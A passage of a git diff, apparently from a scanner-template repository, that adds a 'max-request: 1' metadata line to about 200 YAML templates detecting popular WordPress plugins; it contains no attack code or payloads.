http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/astra-widgets.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + .../technologies/wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cloudflare.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../technologies/wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + http/technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../technologies/wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-and-footer-scripts.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + http/technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/iwp-client.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + http/technologies/wordpress/plugins/loginpress.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../technologies/wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + http/technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + http/technologies/wordpress/plugins/photo-gallery.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-builder.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../technologies/wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/use-any-font.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + .../technologies/wordpress/plugins/velvet-blues-update-urls.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../technologies/wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../technologies/wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 + .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 + http/technologies/wordpress/plugins/woocommerce.yaml | 1 + http/technologies/wordpress/plugins/wordfence.yaml | 1 + http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 + http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 + http/technologies/wordpress/plugins/worker.yaml | 1 + http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 + http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 + http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 + http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 + http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 + http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 + http/technologies/wordpress/plugins/wp-optimize.yaml | 1 + http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 + http/technologies/wordpress/plugins/wp-reset.yaml | 1 + http/technologies/wordpress/plugins/wp-rollback.yaml | 1 + http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 + http/technologies/wordpress/plugins/wp-smushit.yaml | 1 + http/technologies/wordpress/plugins/wp-statistics.yaml | 1 + http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 + http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 + http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 + http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 + http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 + http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 + .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 + 200 files changed, 200 insertions(+) diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index 7cbd1855ae..ebb5ba1042 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: + max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 8d579ff23d..fddfbf3118 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: + max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 4a6d8b7bbe..7a6e8a76ec 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: + max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index e4eb308d39..940c0e614c 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/advanced-custom-fields/ metadata: + max-request: 1 plugin_namespace: advanced-custom-fields wpscan: https://wpscan.com/plugin/advanced-custom-fields tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 97f1d8c18f..06cfd4950b 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/akismet/ metadata: + max-request: 1 plugin_namespace: akismet wpscan: https://wpscan.com/plugin/akismet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml index 10f104f2c7..90aa5881fd 100644 --- a/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml +++ b/http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-404-redirect-to-homepage/ metadata: + max-request: 1 plugin_namespace: all-404-redirect-to-homepage wpscan: https://wpscan.com/plugin/all-404-redirect-to-homepage tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 8addc28ded..1bf337da6c 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-seo-pack/ metadata: + max-request: 1 plugin_namespace: all-in-one-seo-pack wpscan: https://wpscan.com/plugin/all-in-one-seo-pack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2e579621ac..7cec152555 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-migration/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-migration wpscan: https://wpscan.com/plugin/all-in-one-wp-migration tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 41e297ffeb..8a4b6133cd 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/ metadata: + max-request: 1 plugin_namespace: all-in-one-wp-security-and-firewall wpscan: https://wpscan.com/plugin/all-in-one-wp-security-and-firewall tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 0dd8686ec3..cfa2e3d080 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/amp/ metadata: + max-request: 1 plugin_namespace: amp wpscan: https://wpscan.com/plugin/amp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 359671f3bd..a92d9bde4e 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/antispam-bee/ metadata: + max-request: 1 plugin_namespace: antispam-bee wpscan: https://wpscan.com/plugin/antispam-bee tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 116e0c420a..59144c7dd5 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-sites/ metadata: + max-request: 1 plugin_namespace: astra-sites wpscan: https://wpscan.com/plugin/astra-sites tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/astra-widgets.yaml b/http/technologies/wordpress/plugins/astra-widgets.yaml index dc4703ef8d..df06ba2f35 100644 --- a/http/technologies/wordpress/plugins/astra-widgets.yaml +++ b/http/technologies/wordpress/plugins/astra-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/astra-widgets/ metadata: + max-request: 1 plugin_namespace: astra-widgets wpscan: https://wpscan.com/plugin/astra-widgets tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 1426ac3ef2..2a79d529cc 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/autoptimize/ metadata: + max-request: 1 plugin_namespace: autoptimize wpscan: https://wpscan.com/plugin/autoptimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 78d1651ff4..556a113acc 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/backwpup/ metadata: + max-request: 1 plugin_namespace: backwpup wpscan: https://wpscan.com/plugin/backwpup tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index f7219b373d..58d9a9d738 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-search-replace/ metadata: + max-request: 1 plugin_namespace: better-search-replace wpscan: https://wpscan.com/plugin/better-search-replace tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index f688a68f72..6c9c485079 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/better-wp-security/ metadata: + max-request: 1 plugin_namespace: better-wp-security wpscan: https://wpscan.com/plugin/better-wp-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index 00e95c4263..7631e87d78 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/black-studio-tinymce-widget/ metadata: + max-request: 1 plugin_namespace: black-studio-tinymce-widget wpscan: https://wpscan.com/plugin/black-studio-tinymce-widget tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 212b2b13c4..c7daa26ac6 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breadcrumb-navxt/ metadata: + max-request: 1 plugin_namespace: breadcrumb-navxt wpscan: https://wpscan.com/plugin/breadcrumb-navxt tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 6318392c5c..68767e4dce 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/breeze/ metadata: + max-request: 1 plugin_namespace: breeze wpscan: https://wpscan.com/plugin/breeze tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index e1a2a186e0..073618936d 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/broken-link-checker/ metadata: + max-request: 1 plugin_namespace: broken-link-checker wpscan: https://wpscan.com/plugin/broken-link-checker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 23614882a7..6aabc19e9f 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/child-theme-configurator/ metadata: + max-request: 1 plugin_namespace: child-theme-configurator wpscan: https://wpscan.com/plugin/child-theme-configurator tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 85965337cb..ac80e4f31b 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-editor/ metadata: + max-request: 1 plugin_namespace: classic-editor wpscan: https://wpscan.com/plugin/classic-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 33d903a1b4..15d7a24755 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/classic-widgets/ metadata: + max-request: 1 plugin_namespace: classic-widgets wpscan: https://wpscan.com/plugin/classic-widgets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 3c6f8f287b..40ccc15b27 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/click-to-chat-for-whatsapp/ metadata: + max-request: 1 plugin_namespace: click-to-chat-for-whatsapp wpscan: https://wpscan.com/plugin/click-to-chat-for-whatsapp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cloudflare.yaml b/http/technologies/wordpress/plugins/cloudflare.yaml index e555bf93d3..425adf0bfe 100644 --- a/http/technologies/wordpress/plugins/cloudflare.yaml +++ b/http/technologies/wordpress/plugins/cloudflare.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cloudflare/ metadata: + max-request: 1 plugin_namespace: cloudflare wpscan: https://wpscan.com/plugin/cloudflare tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..1fad3cee08 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/cmb2/ metadata: + max-request: 1 plugin_namespace: cmb2 wpscan: https://wpscan.com/plugin/cmb2 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..ebe4ee41a7 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coblocks/ metadata: + max-request: 1 plugin_namespace: coblocks wpscan: https://wpscan.com/plugin/coblocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..5c32110e0e 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/code-snippets/ metadata: + max-request: 1 plugin_namespace: code-snippets wpscan: https://wpscan.com/plugin/code-snippets tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..09c2e2f360 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/coming-soon/ metadata: + max-request: 1 plugin_namespace: coming-soon wpscan: https://wpscan.com/plugin/coming-soon tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..1a2e8beb3e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/complianz-gdpr/ metadata: + max-request: 1 plugin_namespace: complianz-gdpr wpscan: https://wpscan.com/plugin/complianz-gdpr tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..706145493c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7-honeypot/ metadata: + max-request: 1 plugin_namespace: contact-form-7-honeypot wpscan: https://wpscan.com/plugin/contact-form-7-honeypot tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..cf6a6ee635 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-7/ metadata: + max-request: 1 plugin_namespace: contact-form-7 wpscan: https://wpscan.com/plugin/contact-form-7 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..c039765929 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/contact-form-cfdb7/ metadata: + max-request: 1 plugin_namespace: contact-form-cfdb7 wpscan: https://wpscan.com/plugin/contact-form-cfdb7 tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..a2c92dff4b 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -7,6 